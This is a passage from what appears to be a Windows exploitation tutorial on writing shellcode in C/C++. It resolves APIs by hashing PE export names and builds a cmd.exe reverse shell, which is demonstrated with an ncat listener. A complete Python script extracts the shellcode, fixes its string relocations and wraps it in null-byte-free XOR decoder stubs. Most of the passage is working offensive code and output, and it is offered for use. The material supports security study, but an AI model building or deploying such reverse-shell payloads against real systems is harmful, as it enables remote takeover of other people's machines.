   +0x060 StaticLinks      : _LIST_ENTRY [ 0x6830d8 - 0x6830d8 ]
   +0x068 ContextInformation : 0x00686418 Void
   +0x06c OriginalBase     : 0x6851a8
   +0x070 LoadTime         : _LARGE_INTEGER 0x76f0c9d0

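As you can see, I am debugging calc.exe with WinDbg! That's right: the first module is the executable itself. The important field is DllBase. Given the base address of the module, we can analyze the PE file loaded in memory and get all kinds of information, such as the addresses of the exported functions. This is what we do in getProcAddrByHash: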

BYTE *baseAddress = (BYTE *)dte->DllBase;
    if (!baseAddress)           // invalid module(???)
        continue;
    IMAGE_DOS_HEADER *dosHeader = (IMAGE_DOS_HEADER *)baseAddress;
    IMAGE_NT_HEADERS *ntHeaders = (IMAGE_NT_HEADERS *)(baseAddress + dosHeader->e_lfanew);
    DWORD iedRVA = ntHeaders->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT].VirtualAddress;
    if (!iedRVA)                // Export Directory not present
        continue;
    IMAGE_EXPORT_DIRECTORY *ied = (IMAGE_EXPORT_DIRECTORY *)(baseAddress + iedRVA);
    char *moduleName = (char *)(baseAddress + ied->Name);
    DWORD moduleHash = getHash(moduleName);
 
    // The arrays pointed to by AddressOfNames and AddressOfNameOrdinals run in parallel, i.e. the i-th
    // element of both arrays refer to the same function. The first array specifies the name whereas
    // the second the ordinal. This ordinal can then be used as an index in the array pointed to by
    // AddressOfFunctions to find the entry point of the function.
    DWORD *nameRVAs = (DWORD *)(baseAddress + ied->AddressOfNames);
    for (DWORD i = 0; i < ied->NumberOfNames; ++i) {
        char *functionName = (char *)(baseAddress + nameRVAs[i]);
        if (hash == moduleHash + getHash(functionName)) {
            WORD ordinal = ((WORD *)(baseAddress + ied->AddressOfNameOrdinals))[i];
            DWORD functionRVA = ((DWORD *)(baseAddress + ied->AddressOfFunctions))[ordinal];
            return baseAddress + functionRVA;
        }
    }
    .
    .
    .

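To understand this piece of code you need to look at the PE file format specification; I will not go into the details here. The important thing to note is that the addresses in the PE file structures are RVAs (Relative Virtual Addresses), that is, addresses relative to the base address of the PE module (DllBase). For example, if the RVA is 100h and DllBase is 400000h, the RVA refers to data at address 400000h + 100h = 400100h. The module starts with the DOS_HEADER, which contains the RVA (e_lfanew) of the NT_HEADERS. The NT_HEADERS contain the FILE_HEADER and the OPTIONAL_HEADER. The OPTIONAL_HEADER contains an array called DataDirectory, whose entries point to the various directories of the PE module. For details on the Export Directory, see msdn.microsoft.com/en-us/libra…

The C structure associated with the Export Directory is defined as follows: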

typedef struct _IMAGE_EXPORT_DIRECTORY {
    DWORD   Characteristics;
    DWORD   TimeDateStamp;
    WORD    MajorVersion;
    WORD    MinorVersion;
    DWORD   Name;
    DWORD   Base;
    DWORD   NumberOfFunctions;
    DWORD   NumberOfNames;
    DWORD   AddressOfFunctions;     // RVA from base of image
    DWORD   AddressOfNames;         // RVA from base of image
    DWORD   AddressOfNameOrdinals;  // RVA from base of image
} IMAGE_EXPORT_DIRECTORY, *PIMAGE_EXPORT_DIRECTORY;
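
To see how the three parallel arrays cooperate, here is a sketch that resolves a name on a tiny synthetic image. Everything in build_demo_image (the offsets, the names Foo and Bar, the function RVAs) is invented for the demonstration, and the image is treated as if loaded at base 0 so that an RVA is simply an offset into the buffer.

```python
import struct

# IMAGE_EXPORT_DIRECTORY as laid out in the C struct: 40 bytes, little-endian.
EXPORT_DIR = struct.Struct("<IIHHIIIIIII")


def read_cstring(image, rva):
    end = image.index(b"\x00", rva)
    return image[rva:end].decode("ascii")


def find_export(image, export_dir_rva, wanted):
    """Return the RVA of the export named `wanted`, or None if it is absent."""
    fields = EXPORT_DIR.unpack_from(image, export_dir_rva)
    number_of_names, funcs_rva, names_rva, ordinals_rva = fields[7:11]
    for i in range(number_of_names):
        (name_rva,) = struct.unpack_from("<I", image, names_rva + 4 * i)
        if read_cstring(image, name_rva) == wanted:
            # The i-th name pairs with the i-th ordinal, which indexes the functions.
            (ordinal,) = struct.unpack_from("<H", image, ordinals_rva + 2 * i)
            (func_rva,) = struct.unpack_from("<I", image, funcs_rva + 4 * ordinal)
            return func_rva
    return None


def build_demo_image():
    """Build a made-up 128-byte 'module' holding only an export directory."""
    image = bytearray(0x80)
    EXPORT_DIR.pack_into(image, 0x00, 0, 0, 0, 0, 0x70, 1, 2, 2, 0x30, 0x40, 0x50)
    struct.pack_into("<2I", image, 0x30, 0x1000, 0x2000)   # AddressOfFunctions
    struct.pack_into("<2I", image, 0x40, 0x60, 0x64)       # AddressOfNames
    struct.pack_into("<2H", image, 0x50, 1, 0)             # AddressOfNameOrdinals
    image[0x60:0x68] = b"Bar\x00Foo\x00"
    image[0x70:0x79] = b"demo.dll\x00"
    return bytes(image)


image = build_demo_image()
print(hex(find_export(image, 0, "Bar")))
```

In the demo the names are sorted but the ordinals are not, which shows why the lookup cannot index AddressOfFunctions directly with the position of the name.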

DefineFuncPtr

DefineFuncPtr is a handy macro that helps define a pointer to an imported function. Here is an example:

#define HASH_WSAStartup           0x2ddcd540
 
#define DefineFuncPtr(name)       decltype(name) *My_##name = (decltype(name) *)getProcAddrByHash(HASH_##name)
 
DefineFuncPtr(WSAStartup);

WSAStartup is a function imported from ws2_32.dll, so HASH_WSAStartup is computed like this:

DWORD hash = getFunctionHash("ws2_32.dll", "WSAStartup");

When the macro is expanded,

DefineFuncPtr(WSAStartup);

becomes

decltype(WSAStartup) *My_WSAStartup = (decltype(WSAStartup) *)getProcAddrByHash(HASH_WSAStartup)

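where decltype(WSAStartup) is the type of the function WSAStartup. This way we do not need to redefine the function prototype. Note that decltype was introduced in C++11.

Now we can call WSAStartup through My_WSAStartup.

Note that before importing a function from a module, we need to make sure that the module is already loaded in memory.

The simplest way is to load the module with LoadLibrary: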

DefineFuncPtr(LoadLibraryA);
  My_LoadLibraryA("ws2_32.dll");

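This works because LoadLibrary is imported from kernel32.dll, which is always present in memory.

We could also import GetProcAddress and use it to get the addresses of all the other functions we need, but that would be wasteful, because we would have to include the full function names in the shellcode.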

entryPoint

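entryPoint is, obviously, the entry point of the shellcode and implements the reverse shell. First we import all the functions we need, and then we use them. The details are not important, and I must say that the winsock API is very cumbersome to use.

In a nutshell:

1. create a socket,

2. connect the socket to 127.0.0.1:123,

3. create a process that executes cmd.exe,

4. attach the socket to the standard input, standard output, and standard error of the process,

5. wait for the process to terminate,

6. when the process has terminated, terminate the current thread.

Points 3 and 4 are performed at the same time by the call to CreateProcess. Thanks to point 4, the attacker can listen on port 123 for a connection and, once connected, interact with the cmd.exe running on the remote machine through the socket, that is, the TCP connection.

To try it, install ncat, run cmd.exe, and enter the following at the command prompt: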

ncat -lvp 123

This starts listening on port 123.

Then go back to Visual Studio 2013, select Release, build the project, and run it. Return to ncat and you should see something like this:

Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

C:\Users\Kiuhnm>ncat -lvp 123
Ncat: Version 6.47 ( http://nmap.org/ncat )
Ncat: Listening on :::123
Ncat: Listening on 0.0.0.0:123
Ncat: Connection from 127.0.0.1.
Ncat: Connection from 127.0.0.1:4409.
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

C:\Users\Kiuhnm\documents\visual studio 2013\Projects\shellcode\shellcode>

Now you can run any command you like. To quit, type exit.

main

Thanks to the linker option

Function Order: function_order.txt

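together with a function_order.txt whose only line is ?entryPoint@@YAHXZ, the function entryPoint is placed first in the shellcode.

The linker appears to honor the order of the functions in the source code, so we could also have placed entryPoint before any other function. The main function comes last in the source code, so it is linked at the end of the shellcode. We will see how this is used when we describe the map file.

0x02 Python script

Introduction

Now that the executable containing our shellcode is ready, we need a way to extract and fix the shellcode. This is not easy, so I wrote a Python script that:

1. extracts the shellcode,

2. handles the relocations for the strings,

3. fixes the shellcode by removing the null bytes.

I use PyCharm.

The script is only 392 lines long, but it is somewhat tricky, so I will explain it. Here is the code: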

# Shellcode extractor by Massimiliano Tomassoli (2015)
 
import sys
import os
import datetime
import pefile
 
author = 'Massimiliano Tomassoli'
year = datetime.date.today().year
 
 
def dword_to_bytes(value):
    return [value & 0xff, (value >> 8) & 0xff, (value >> 16) & 0xff, (value >> 24) & 0xff]
 
 
def bytes_to_dword(bytes):
    return (bytes[0] & 0xff) | ((bytes[1] & 0xff) << 8) | \
           ((bytes[2] & 0xff) << 16) | ((bytes[3] & 0xff) << 24)
 
 
def get_cstring(data, offset):
    '''
    Extracts a C string (i.e. null-terminated string) from data starting from offset.
    '''
    pos = data.find('\0', offset)
    if pos == -1:
        return None
    return data[offset:pos+1]
 
 
def get_shellcode_len(map_file):
    '''
    Gets the length of the shellcode by analyzing map_file (map produced by VS 2013)
    '''
    try:
        with open(map_file, 'r') as f:
            lib_object = None
            shellcode_len = None
            for line in f:
                parts = line.split()
                if lib_object is not None:
                    if parts[-1] == lib_object:
                        raise Exception('_main is not the last function of %s' % lib_object)
                    else:
                        break
                elif (len(parts) > 2 and parts[1] == '_main'):
                    # Format:
                    # 0001:00000274  _main   00401274 f   shellcode.obj
                    shellcode_len = int(parts[0].split(':')[1], 16)
                    lib_object = parts[-1]
 
            if shellcode_len is None:
                raise Exception('Cannot determine shellcode length')
    except IOError:
        print('[!] get_shellcode_len: Cannot open "%s"' % map_file)
        return None
    except Exception as e:
        print('[!] get_shellcode_len: %s' % e.message)
        return None
 
    return shellcode_len
 
 
def get_shellcode_and_relocs(exe_file, shellcode_len):
    '''
    Extracts the shellcode from the .text section of the file exe_file and the string
    relocations.
    Returns the triple (shellcode, relocs, addr_to_strings).
    '''
    try:
        # Extracts the shellcode.
        pe = pefile.PE(exe_file)
        shellcode = None
        rdata = None
        for s in pe.sections:
            if s.Name == '.text\0\0\0':
                if s.SizeOfRawData < shellcode_len:
                    raise Exception('.text section too small')
                shellcode_start = s.VirtualAddress
                shellcode_end = shellcode_start + shellcode_len
                shellcode = pe.get_data(s.VirtualAddress, shellcode_len)
            elif s.Name == '.rdata\0\0':
                rdata_start = s.VirtualAddress
                rdata_end = rdata_start + s.Misc_VirtualSize
                rdata = pe.get_data(rdata_start, s.Misc_VirtualSize)
 
        if shellcode is None:
            raise Exception('.text section not found')
        if rdata is None:
            raise Exception('.rdata section not found')
 
        # Extracts the relocations for the shellcode and the referenced strings in .rdata.
        relocs = []
        addr_to_strings = {}
        for rel_data in pe.DIRECTORY_ENTRY_BASERELOC:
            for entry in rel_data.entries[:-1]:         # the last element's rvs is the base_rva (why?)
                if shellcode_start <= entry.rva < shellcode_end:
                    # The relocation location is inside the shellcode.
                    relocs.append(entry.rva - shellcode_start)      # offset relative to the start of shellcode
                    string_va = pe.get_dword_at_rva(entry.rva)
                    string_rva = string_va - pe.OPTIONAL_HEADER.ImageBase
                    if string_rva < rdata_start or string_rva >= rdata_end:
                        raise Exception('shellcode references a section other than .rdata')
                    str = get_cstring(rdata, string_rva - rdata_start)
                    if str is None:
                        raise Exception('Cannot extract string from .rdata')
                    addr_to_strings[string_va] = str
 
        return (shellcode, relocs, addr_to_strings)
 
    except WindowsError:
        print('[!] get_shellcode: Cannot open "%s"' % exe_file)
        return None
    except Exception as e:
        print('[!] get_shellcode: %s' % e.message)
        return None
 
 
def dword_to_string(dword):
    return ''.join([chr(x) for x in dword_to_bytes(dword)])
 
 
def add_loader_to_shellcode(shellcode, relocs, addr_to_strings):
    if len(relocs) == 0:
        return shellcode                # there are no relocations
 
    # The format of the new shellcode is:
    #       call    here
    #   here:
    #       ...
    #   shellcode_start:
    #       <shellcode>         (contains offsets to strX (offset are from "here" label))
    #   relocs:
    #       off1|off2|...       (offsets to relocations (offset are from "here" label))
    #       str1|str2|...
 
    delta = 21                                      # shellcode_start - here
 
    # Builds the first part (up to and not including the shellcode).
    x = dword_to_bytes(delta + len(shellcode))
    y = dword_to_bytes(len(relocs))
    code = [
        0xE8, 0x00, 0x00, 0x00, 0x00,               #   CALL here
                                                    # here:
        0x5E,                                       #   POP ESI
        0x8B, 0xFE,                                 #   MOV EDI, ESI
        0x81, 0xC6, x[0], x[1], x[2], x[3],         #   ADD ESI, shellcode_start + len(shellcode) - here
        0xB9, y[0], y[1], y[2], y[3],               #   MOV ECX, len(relocs)
        0xFC,                                       #   CLD
                                                    # again:
        0xAD,                                       #   LODSD
        0x01, 0x3C, 0x07,                           #   ADD [EDI+EAX], EDI
        0xE2, 0xFA                                  #   LOOP again
                                                    # shellcode_start:
    ]
 
    # Builds the final part (offX and strX).
    offset = delta + len(shellcode) + len(relocs) * 4           # offset from "here" label
    final_part = [dword_to_string(r + delta) for r in relocs]
    addr_to_offset = {}
    for addr in addr_to_strings.keys():
        str = addr_to_strings[addr]
        final_part.append(str)
        addr_to_offset[addr] = offset
        offset += len(str)
 
    # Fixes the shellcode so that the pointers referenced by relocs point to the
    # string in the final part.
    byte_shellcode = [ord(c) for c in shellcode]
    for off in relocs:
        addr = bytes_to_dword(byte_shellcode[off:off+4])
        byte_shellcode[off:off+4] = dword_to_bytes(addr_to_offset[addr])
 
    return ''.join([chr(b) for b in (code + byte_shellcode)]) + ''.join(final_part)
 
 
def dump_shellcode(shellcode):
    '''
    Prints shellcode in C format ('\x12\x23...')
    '''
    shellcode_len = len(shellcode)
    sc_array = []
    bytes_per_row = 16
    for i in range(shellcode_len):
        pos = i % bytes_per_row
        str = ''
        if pos == 0:
            str += '"'
        str += '\\x%02x' % ord(shellcode[i])
        if i == shellcode_len - 1:
            str += '";\n'
        elif pos == bytes_per_row - 1:
            str += '"\n'
        sc_array.append(str)
    shellcode_str = ''.join(sc_array)
    print(shellcode_str)
 
 
def get_xor_values(value):
    '''
    Finds x and y such that:
    1) x xor y == value
    2) x and y don't contain null bytes
    Returns x and y as arrays of bytes starting from the least significant byte.
    '''
 
    # Finds a non-null missing byte.
    bytes = dword_to_bytes(value)
    missing_byte = [b for b in range(1, 256) if b not in bytes][0]
 
    xor1 = [b ^ missing_byte for b in bytes]
    xor2 = [missing_byte] * 4
    return (xor1, xor2)
 
 
def get_fixed_shellcode_single_block(shellcode):
    '''
    Returns a version of shellcode without null bytes or None if the
    shellcode can't be fixed.
    If this function fails, use get_fixed_shellcode().
    '''
 
    # Finds one non-null byte not present, if any.
    bytes = set([ord(c) for c in shellcode])
    missing_bytes = [b for b in range(1, 256) if b not in bytes]
    if len(missing_bytes) == 0:
        return None                             # shellcode can't be fixed
    missing_byte = missing_bytes[0]
 
    (xor1, xor2) = get_xor_values(len(shellcode))
 
    code = [
        0xE8, 0xFF, 0xFF, 0xFF, 0xFF,                       #   CALL $ + 4
                                                            # here:
        0xC0,                                               #   (FF)C0 = INC EAX
        0x5F,                                               #   POP EDI
        0xB9, xor1[0], xor1[1], xor1[2], xor1[3],           #   MOV ECX, <xor value 1 for shellcode len>
        0x81, 0xF1, xor2[0], xor2[1], xor2[2], xor2[3],     #   XOR ECX, <xor value 2 for shellcode len>
        0x83, 0xC7, 29,                                     #   ADD EDI, shellcode_begin - here
        0x33, 0xF6,                                         #   XOR ESI, ESI
        0xFC,                                               #   CLD
                                                            # loop1:
        0x8A, 0x07,                                         #   MOV AL, BYTE PTR [EDI]
        0x3C, missing_byte,                                 #   CMP AL, <missing byte>
        0x0F, 0x44, 0xC6,                                   #   CMOVE EAX, ESI
        0xAA,                                               #   STOSB
        0xE2, 0xF6                                          #   LOOP loop1
                                                            # shellcode_begin:
    ]
 
    return ''.join([chr(x) for x in code]) + shellcode.replace('\0', chr(missing_byte))
 
 
def get_fixed_shellcode(shellcode):
    '''
    Returns a version of shellcode without null bytes. This version divides
    the shellcode into multiple blocks and should be used only if
    get_fixed_shellcode_single_block() doesn't work with this shellcode.
    '''
 
    # The format of bytes_blocks is
    #   [missing_byte1, number_of_blocks1,
    #    missing_byte2, number_of_blocks2, ...]
    # where missing_byteX is the value used to overwrite the null bytes in the
    # shellcode, while number_of_blocksX is the number of 254-byte blocks where
    # to use the corresponding missing_byteX.
    bytes_blocks = []
    shellcode_len = len(shellcode)
    i = 0
    while i < shellcode_len:
        num_blocks = 0
        missing_bytes = list(range(1, 256))
 
        # Tries to find as many 254-byte contiguous blocks as possible which misses at
        # least one non-null value. Note that a single 254-byte block always misses at
        # least one non-null value.
        while True:
            if i >= shellcode_len or num_blocks == 255:
                bytes_blocks += [missing_bytes[0], num_blocks]
                break
            bytes = set([ord(c) for c in shellcode[i:i+254]])
            new_missing_bytes = [b for b in missing_bytes if b not in bytes]
            if len(new_missing_bytes) != 0:         # new block added
                missing_bytes = new_missing_bytes
                num_blocks += 1
                i += 254
            else:
                bytes_blocks += [missing_bytes[0], num_blocks]
                break
 
    if len(bytes_blocks) > 0x7f - 5:
        # Can't assemble "LEA EBX, [EDI + (bytes-here)]" or "JMP skip_bytes".
        return None
 
    (xor1, xor2) = get_xor_values(len(shellcode))
 
    code = ([
        0xEB, len(bytes_blocks)] +                          #   JMP SHORT skip_bytes
                                                            # bytes:
        bytes_blocks + [                                    #   ...
                                                            # skip_bytes:
        0xE8, 0xFF, 0xFF, 0xFF, 0xFF,                       #   CALL $ + 4
                                                            # here:
        0xC0,                                               #   (FF)C0 = INC EAX
        0x5F,                                               #   POP EDI
        0xB9, xor1[0], xor1[1], xor1[2], xor1[3],           #   MOV ECX, <xor value 1 for shellcode len>
        0x81, 0xF1, xor2[0], xor2[1], xor2[2], xor2[3],     #   XOR ECX, <xor value 2 for shellcode len>
        0x8D, 0x5F, -(len(bytes_blocks) + 5) & 0xFF,        #   LEA EBX, [EDI + (bytes - here)]
        0x83, 0xC7, 0x30,                                   #   ADD EDI, shellcode_begin - here
                                                            # loop1:
        0xB0, 0xFE,                                         #   MOV AL, 0FEh
        0xF6, 0x63, 0x01,                                   #   MUL AL, BYTE PTR [EBX+1]
        0x0F, 0xB7, 0xD0,                                   #   MOVZX EDX, AX
        0x33, 0xF6,                                         #   XOR ESI, ESI
        0xFC,                                               #   CLD
                                                            # loop2:
        0x8A, 0x07,                                         #   MOV AL, BYTE PTR [EDI]
        0x3A, 0x03,                                         #   CMP AL, BYTE PTR [EBX]
        0x0F, 0x44, 0xC6,                                   #   CMOVE EAX, ESI
        0xAA,                                               #   STOSB
        0x49,                                               #   DEC ECX
        0x74, 0x07,                                         #   JE shellcode_begin
        0x4A,                                               #   DEC EDX
        0x75, 0xF2,                                         #   JNE loop2
        0x43,                                               #   INC EBX
        0x43,                                               #   INC EBX
        0xEB, 0xE3                                          #   JMP loop1
                                                            # shellcode_begin:
    ])
 
    new_shellcode_pieces = []
    pos = 0
    for i in range(len(bytes_blocks) // 2):
        missing_char = chr(bytes_blocks[i*2])
        num_bytes = 254 * bytes_blocks[i*2 + 1]
        new_shellcode_pieces.append(shellcode[pos:pos+num_bytes].replace('\0', missing_char))
        pos += num_bytes
 
    return ''.join([chr(x) for x in code]) + ''.join(new_shellcode_pieces)
 
 
def main():
    print("Shellcode Extractor by %s (%d)\n" % (author, year))
 
    if len(sys.argv) != 3:
        print('Usage:\n' +
              '  %s <exe file> <map file>\n' % os.path.basename(sys.argv[0]))
        return
 
    exe_file = sys.argv[1]
    map_file = sys.argv[2]
 
    print('Extracting shellcode length from "%s"...' % os.path.basename(map_file))
    shellcode_len = get_shellcode_len(map_file)
    if shellcode_len is None:
        return
    print('shellcode length: %d' % shellcode_len)
 
    print('Extracting shellcode from "%s" and analyzing relocations...' % os.path.basename(exe_file))
    result = get_shellcode_and_relocs(exe_file, shellcode_len)
    if result is None:
        return
    (shellcode, relocs, addr_to_strings) = result
 
    if len(relocs) != 0:
        print('Found %d reference(s) to %d string(s) in .rdata' % (len(relocs), len(addr_to_strings)))
        print('Strings:')
        for s in addr_to_strings.values():
            print('  ' + s[:-1])
        print('')
        shellcode = add_loader_to_shellcode(shellcode, relocs, addr_to_strings)
    else:
        print('No relocations found')
 
    if shellcode.find('\0') == -1:
        print('Unbelievable: the shellcode does not need to be fixed!')
        fixed_shellcode = shellcode
    else:
        # shellcode contains null bytes and needs to be fixed.
        print('Fixing the shellcode...')
        fixed_shellcode = get_fixed_shellcode_single_block(shellcode)
        if fixed_shellcode is None:             # if shellcode wasn't fixed...
            fixed_shellcode = get_fixed_shellcode(shellcode)
            if fixed_shellcode is None:
                print('[!] Cannot fix the shellcode')
 
    print('final shellcode length: %d\n' % len(fixed_shellcode))
    print('char shellcode[] = ')
    dump_shellcode(fixed_shellcode)
 
 
main()

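Map file and `shellcode` length

We told the linker to produce a map file with the following options:

Debugging:
- Generate Map File: Yes (/MAP)

This tells the linker to generate a map file that describes the structure of the EXE.

- Map File Name: mapfile

The map file is mainly used to determine the length of the shellcode.

Here is the relevant part of the map file: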

shellcode

 Timestamp is 54fa2c08 (Fri Mar 06 23:36:56 2015)

 Preferred load address is 00400000

 Start         Length     Name                   Class
 0001:00000000 00000a9cH .text$mn                CODE
 0002:00000000 00000094H .idata$5                DATA
 0002:00000094 00000004H .CRT$XCA                DATA
 0002:00000098 00000004H .CRT$XCAA               DATA
 0002:0000009c 00000004H .CRT$XCZ                DATA
 0002:000000a0 00000004H .CRT$XIA                DATA
 0002:000000a4 00000004H .CRT$XIAA               DATA
 0002:000000a8 00000004H .CRT$XIC                DATA
 0002:000000ac 00000004H .CRT$XIY                DATA
 0002:000000b0 00000004H .CRT$XIZ                DATA
 0002:000000c0 000000a8H .rdata                  DATA
 0002:00000168 00000084H .rdata$debug            DATA
 0002:000001f0 00000004H .rdata$sxdata           DATA
 0002:000001f4 00000004H .rtc$IAA                DATA
 0002:000001f8 00000004H .rtc$IZZ                DATA
 0002:000001fc 00000004H .rtc$TAA                DATA
 0002:00000200 00000004H .rtc$TZZ                DATA
 0002:00000208 0000005cH .xdata$x                DATA
 0002:00000264 00000000H .edata                  DATA
 0002:00000264 00000028H .idata$2                DATA
 0002:0000028c 00000014H .idata$3                DATA
 0002:000002a0 00000094H .idata$4                DATA
 0002:00000334 0000027eH .idata$6                DATA
 0003:00000000 00000020H .data                   DATA
 0003:00000020 00000364H .bss                    DATA
 0004:00000000 00000058H .rsrc$01                DATA
 0004:00000060 00000180H .rsrc$02                DATA

  Address         Publics by Value              Rva+Base       Lib:Object

 0000:00000000       ___guard_fids_table        00000000     <absolute>
 0000:00000000       ___guard_fids_count        00000000     <absolute>
 0000:00000000       ___guard_flags             00000000     <absolute>
 0000:00000001       ___safe_se_handler_count   00000001     <absolute>
 0000:00000000       ___ImageBase               00400000     <linker-defined>
 0001:00000000       ?entryPoint@@YAHXZ         00401000 f   shellcode.obj
 0001:000001a1       ?getHash@@YAKPBD@Z         004011a1 f   shellcode.obj
 0001:000001be       ?getProcAddrByHash@@YAPAXK@Z 004011be f   shellcode.obj
 0001:00000266       _main                      00401266 f   shellcode.obj
 0001:000004d4       _mainCRTStartup            004014d4 f   MSVCRT:crtexe.obj
 0001:000004de       ?__CxxUnhandledExceptionFilter@@YGJPAU_EXCEPTION_POINTERS@@@Z 004014de f   MSVCRT:unhandld.obj
 0001:0000051f       ___CxxSetUnhandledExceptionFilter 0040151f f   MSVCRT:unhandld.obj
 0001:0000052e       __XcptFilter               0040152e f   MSVCRT:MSVCR120.dll
<snip>

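The start of the map file tells us that section 1 is the .text section, which contains the code:

Start         Length     Name                   Class
0001:00000000 00000a9cH .text$mn                CODE

The second part tells us that the .text section starts with ?entryPoint@@YAHXZ, our entryPoint function, and that main (called _main here) is the last of our functions. Since main is at offset 0x266 and entryPoint is at offset 0, our shellcode starts at the beginning of the .text section and is 0x266 bytes long.

Here is how we do that in Python: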

def get_shellcode_len(map_file):
    '''
    Gets the length of the shellcode by analyzing map_file (map produced by VS 2013)
    '''
    try:
        with open(map_file, 'r') as f:
            lib_object = None
            shellcode_len = None
            for line in f:
                parts = line.split()
                if lib_object is not None:
                    if parts[-1] == lib_object:
                        raise Exception('_main is not the last function of %s' % lib_object)
                    else:
                        break
                elif (len(parts) > 2 and parts[1] == '_main'):
                    # Format:
                    # 0001:00000274  _main   00401274 f   shellcode.obj
                    shellcode_len = int(parts[0].split(':')[1], 16)
                    lib_object = parts[-1]
 
            if shellcode_len is None:
                raise Exception('Cannot determine shellcode length')
    except IOError:
        print('[!] get_shellcode_len: Cannot open "%s"' % map_file)
        return None
    except Exception as e:
        print('[!] get_shellcode_len: %s' % e.message)
        return None
 
    return shellcode_len
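
As a quick check of the arithmetic, here is a minimal Python 3 sketch that parses the _main line of the map file excerpt shown earlier. The helper name parse_map_symbol is hypothetical and is not part of the original script; it only illustrates that the offset of _main within section 0001 is the length of the shellcode.

```python
def parse_map_symbol(line):
    """Split one "Publics by Value" line into (section, offset, name)."""
    parts = line.split()
    section, offset = parts[0].split(':')
    return int(section, 16), int(offset, 16), parts[1]


# Line copied from the map file excerpt above.
sample = ' 0001:00000266       _main                      00401266 f   shellcode.obj'
section, offset, name = parse_map_symbol(sample)

# entryPoint sits at offset 0 of the same section, so the offset of _main
# is also the number of bytes that precede it, i.e. the shellcode length.
shellcode_len = offset
print('%s at %04x:%08x, shellcode length = 0x%x' % (name, section, offset, shellcode_len))
```

The real get_shellcode_len additionally checks that _main is the last function coming from its object file, which this sketch leaves out.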

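Extracting the shellcode

This part is straightforward: we know the length of the shellcode and we know that the shellcode is located at the beginning of the .text section. Here is the code: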

def get_shellcode_and_relocs(exe_file, shellcode_len):
    '''
    Extracts the shellcode from the .text section of the file exe_file and the string
    relocations.
    Returns the triple (shellcode, relocs, addr_to_strings).
    '''
    try:
        # Extracts the shellcode.
        pe = pefile.PE(exe_file)
        shellcode = None
        rdata = None
        for s in pe.sections:
            if s.Name == '.text\0\0\0':
                if s.SizeOfRawData < shellcode_len:
                    raise Exception('.text section too small')
                shellcode_start = s.VirtualAddress
                shellcode_end = shellcode_start + shellcode_len
                shellcode = pe.get_data(s.VirtualAddress, shellcode_len)
            elif s.Name == '.rdata\0\0':
                <snip>
 
        if shellcode is None:
            raise Exception('.text section not found')
        if rdata is None:
            raise Exception('.rdata section not found')
<snip>

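I used the pefile module (download). The relevant part is the body of the if statement.

Strings and .rdata

As we said before, C/C++ code may contain strings. For instance, our shellcode contains the following code: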

My_CreateProcessA(NULL, "cmd.exe", NULL, NULL, TRUE, 0, NULL, NULL, &sInfo, &procInfo);

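The string cmd.exe is located in the .rdata section, a read-only section that contains initialized data. The code refers to that string through an absolute address: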

00241152 50                   push        eax  
00241153 8D 44 24 5C          lea         eax,[esp+5Ch]  
00241157 C7 84 24 88 00 00 00 00 01 00 00 mov         dword ptr [esp+88h],100h  
00241162 50                   push        eax  
00241163 52                   push        edx  
00241164 52                   push        edx  
00241165 52                   push        edx  
00241166 6A 01                push        1  
00241168 52                   push        edx  
00241169 52                   push        edx  
0024116A 68 18 21 24 00       push        242118h         <------------------------
0024116F 52                   push        edx  
00241170 89 B4 24 C0 00 00 00 mov         dword ptr [esp+0C0h],esi  
00241177 89 B4 24 BC 00 00 00 mov         dword ptr [esp+0BCh],esi  
0024117E 89 B4 24 B8 00 00 00 mov         dword ptr [esp+0B8h],esi  
00241185 FF 54 24 34          call        dword ptr [esp+34h]

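As we can see, the absolute address of cmd.exe is 242118h. Note that this address is part of a push instruction and is itself located at 24116Bh. If we examine the compiled executable with a file editor, we see the following: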

56A: 68 18 21 40 00           push        000402118h

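Here 56Ah is the offset in the file. Because the image base is 400000h, the corresponding virtual address is 40116Ah. 400000h is the preferred base address at which the executable should be loaded in memory. The absolute address in the instruction, 402118h, is correct if the executable is loaded at its preferred base address. If the executable is loaded at a different base address, however, the instruction needs to be fixed. How does Windows know which locations in the executable contain addresses that need to be fixed? The PE file has a Relocation Directory, which in our case points to the .reloc section. It contains the RVAs of all the locations that need to be fixed.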
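
The relation between the addresses in the file and the addresses in the debugger listing can be checked with a few lines of Python 3. This is only a sketch: the helper names are hypothetical, and the actual load address 240000h is an assumption inferred from the disassembly above (the push sits at 0024116Ah instead of 0040116Ah).

```python
PREFERRED_BASE = 0x00400000   # "Preferred load address" from the map file
ACTUAL_BASE = 0x00240000      # assumption: inferred from the disassembly addresses


def va_to_rva(va, image_base):
    """RVA = VA - base address of the module."""
    return va - image_base


def rebase(va, preferred_base, actual_base):
    """Address that 'va' becomes when the module is loaded at actual_base."""
    return va_to_rva(va, preferred_base) + actual_base


string_va = 0x00402118        # operand of "push 402118h" as stored in the file
push_va = 0x0040116A          # address of the push instruction itself

print(hex(rebase(string_va, PREFERRED_BASE, ACTUAL_BASE)))
print(hex(rebase(push_va, PREFERRED_BASE, ACTUAL_BASE)))
```

Both results match the listing: the operand becomes 242118h and the instruction lands at 24116Ah, which is the adjustment the Windows loader applies to every location listed in the Relocation Directory.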

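We can inspect this directory and look for the addresses of locations that

1. are contained in the shellcode (i.e. go from .text:0 up to, but not including, main), and
2. contain pointers to data in .rdata.

For instance, the Relocation Directory will contain, among other addresses, the address 40116Bh, which locates the last four bytes of the instruction push 402118h. These bytes form the address 402118h, which points to the string cmd.exe in .rdata (which starts at address 402000h).

Let's look at the function get_shellcode_and_relocs. In the first part we extract the .rdata section: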

def get_shellcode_and_relocs(exe_file, shellcode_len):
    '''
    Extracts the shellcode from the .text section of the file exe_file and the string
    relocations.
    Returns the triple (shellcode, relocs, addr_to_strings).
    '''
    try:
        # Extracts the shellcode.
        pe = pefile.PE(exe_file)
        shellcode = None
        rdata = None
        for s in pe.sections:
            if s.Name == '.text\0\0\0':
                <snip>
            elif s.Name == '.rdata\0\0':
                rdata_start = s.VirtualAddress
                rdata_end = rdata_start + s.Misc_VirtualSize
                rdata = pe.get_data(rdata_start, s.Misc_VirtualSize)
 
        if shellcode is None:
            raise Exception('.text section not found')
        if rdata is None:
            raise Exception('.rdata section not found')

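The relevant part is the body of the elif.

Next we analyze the relocations, find the locations that fall within our shellcode, and extract from .rdata the null-terminated strings referenced by those locations.

As we already said, we are only interested in the locations contained in our shellcode. Here is the relevant part of the function get_shellcode_and_relocs: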

